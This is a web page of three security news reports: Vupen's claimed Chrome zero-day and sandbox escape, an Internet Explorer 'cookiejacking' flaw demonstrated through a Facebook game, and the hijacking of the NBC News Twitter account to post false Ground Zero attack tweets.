href%3D%22http%3A%2F%2Fstatcounter.com%2Ffree_hit_counter.html%22+target%3D%22_blank%22%3E%3Cimg+class%3D%22statcounter%22+src%3D%22http%3A%2F%2Fc.statcounter.com%2F6474887%2F0%2F9181d223%2F1%2F%22+alt%3D%22hit+counter%22+%3E%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E+%3C!--+End+of+StatCounter+Code+--%3E%3C%2Fbody%3E+%3C%2Fdiv%3E+%3C%2Fform%3E+%3C%2Fcenter%3E+%3C%2Fbody%3E&x=0&y=0


Security firm exploits Chrome zero-day to hack browser, escape sandbox


 French security company Vupen said today that it's figured out how to hack Google's Chrome by sidestepping not only the browser's built-in "sandbox" but also by evading Windows 7's integrated anti-exploit technologies.
Google said it was unable to confirm Vupen's claims.
"The exploit ... is one of the most sophisticated codes we have seen and created so far, as it bypasses all security features including ASLR/DEP/Sandbox," said Vupen in a blog post Monday. "It is silent (no crash after executing the payload), it relies on undisclosed ('zero-day') vulnerabilities and it works on all Windows systems."
Vupen posted a video demonstration of its exploit on YouTube.
According to Vupen, its exploit can be served from a malicious Web site. If a Chrome user surfed to such a site, the exploit executes "various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level."
Vupen used the Windows Calculator only as an example: In an actual attack, the "calc.exe" file would be replaced by a hacker-made payload.
Historically, Chrome has been the most difficult browser to hack, primarily because of its sandbox technology, which is designed to isolate Chrome from the rest of the machine to make it very difficult for a hacker to execute attack code on the PC.
For example, Chrome has escaped unscathed in the last three Pwn2Own hacking contests, an annual challenge hosted by the CanSecWest conference in Vancouver, British Columbia, and sponsored by HP TippingPoint's bug bounty program.
Last March, a team from Vupen walked away with a $15,000 cash prize after hacking Safari, the Apple browser that, like Chrome, is built on the open-source WebKit browser engine.
But no one took on Chrome at 2011's Pwn2Own, even though Google had offered a $20,000 prize to the first researcher who hacked the browser and its sandbox.
The Vupen attack code also bypassed Windows 7's ASLR (address space layout randomization) and DEP (data execution prevention), two other security technologies meant to make hackers' jobs tougher.
Vupen said it would not publicly release details of the exploit, or the unpatched bug(s) in Chrome. "This code and the technical details of the underlying vulnerabilities will not be publicly disclosed," said Vupen. "They are shared exclusively with our Government customers as part of our vulnerability research services."
Last year, Vupen changed its vulnerability disclosure policies when it announced it would no longer report bugs to vendors, but instead would reveal its research only to paying customers.
Other security experts reacted today to the news of one or more Chrome zero-days, and to Vupen's practice of providing details only to its clients.
"I suppose that means we have a known Chrome 0-day floating around. That's fun," said Jeremiah Grossman, CTO of WhiteHat Security, in a Twitter message today.
"That also means that the [government] is outbidding Google for bug bounties," Grossman added in a follow-up tweet.
"For now, the [government] still has more money than Google," chimed in Charlie Miller, the only researcher who has won cash prizes at four straight Pwn2Own contests.
Google, like rival browser maker Mozilla, runs a bounty program that pays independent researchers for reporting flaws in Chrome. Last month, Google paid out a record $16,500 in bounties for bugs it patched in a single update. In the first four months of 2011, Google spent more than $77,000 on bug bounties.
Google cited Vupen's policy of not reporting flaws as the reason it could not verify the French firm's assertions.

IE Flaw Can Cause Zero-Day Exploit


A security breach of Internet Explorer could occur if a hacker hijacks session cookies from users' visits to a Web site, according to Rosario Valotta, an Italian security researcher. In a process Valotta coined "cookiejacking," the stolen data can be used to carry out a zero-day attack. Successfully compromised systems can have malware installed on them, send messages or forge clicks. The researcher warns that this flaw affects all versions of Microsoft’s Internet browser.

The exploit only works when a user drags and drops an object across the PC screen. Valotta tested this by creating a Facebook game in which users dragged articles of clothing to reveal an undressed photo of a woman. "I published this game online on FaceBook and in less than three days, more than 80 cookies were sent to my server," Valotta told Reuters. "And I've only got 150 friends."

To leverage this into a zero-day attack, a hacker would need to create an IFrame element in a Web site and have a user select the entire cookie. In Valotta's Facebook demonstration, the cookie was hidden inside the article-of-clothing object. Once a user drags the piece of clothing, the browser’s cross-zone interaction policy is violated, which allows the attacker access to the victim’s system. Adding to the difficulty of performing this attack, the exploit requires the hacker to know the potential victim’s Windows username and which OS version is in use -- before getting the user to select the entire content of the harmful cookie.

While Microsoft is investigating the flaw, Microsoft spokesman Jerry Bryant believes there is little risk of the vulnerability being exploited. "Given the level of required user interaction, this issue is not one we consider high risk," said Bryant.


Twitter Account of NBC News Hacked



Hackers compromised the NBC News Twitter account today and sent several fake tweets from the account about an attack on Ground Zero reminiscent of the attacks of September 11, 2001.
"Breaking News! Ground Zero has just been attacked. Flight 5736 has crashed into the site, suspected hijacking. More as the story develops," was the first tweet this afternoon. It was followed by two others, including one that started "This is not a joke."
The fourth tweet said "NBCNEWS hacked by The Script Kiddies."


An e-mailed NBC News statement said: "The NBC News twitter account was hacked late this afternoon and as a result, false reports of a plane attack on ground zero were sent to @NBCNews followers. We are working with Twitter to correct the situation and sincerely apologize for the scare that could have been caused by such a reckless and irresponsible act."
NBC News also used the Twitter account of its chief digital officer, Vivian Schiller, to alert followers to the problem. "Ignore tweets from @nbcnews till further notice. We've been hacked. Do not retweet," her account tweeted early on. A search for the NBC News Twitter profile shortly thereafter displayed the message "This user does not exist."
It's unclear who the Script Kiddies are. The profile for the Script Kiddies--a term used to describe novice hackers--also appeared to have been removed from Twitter.
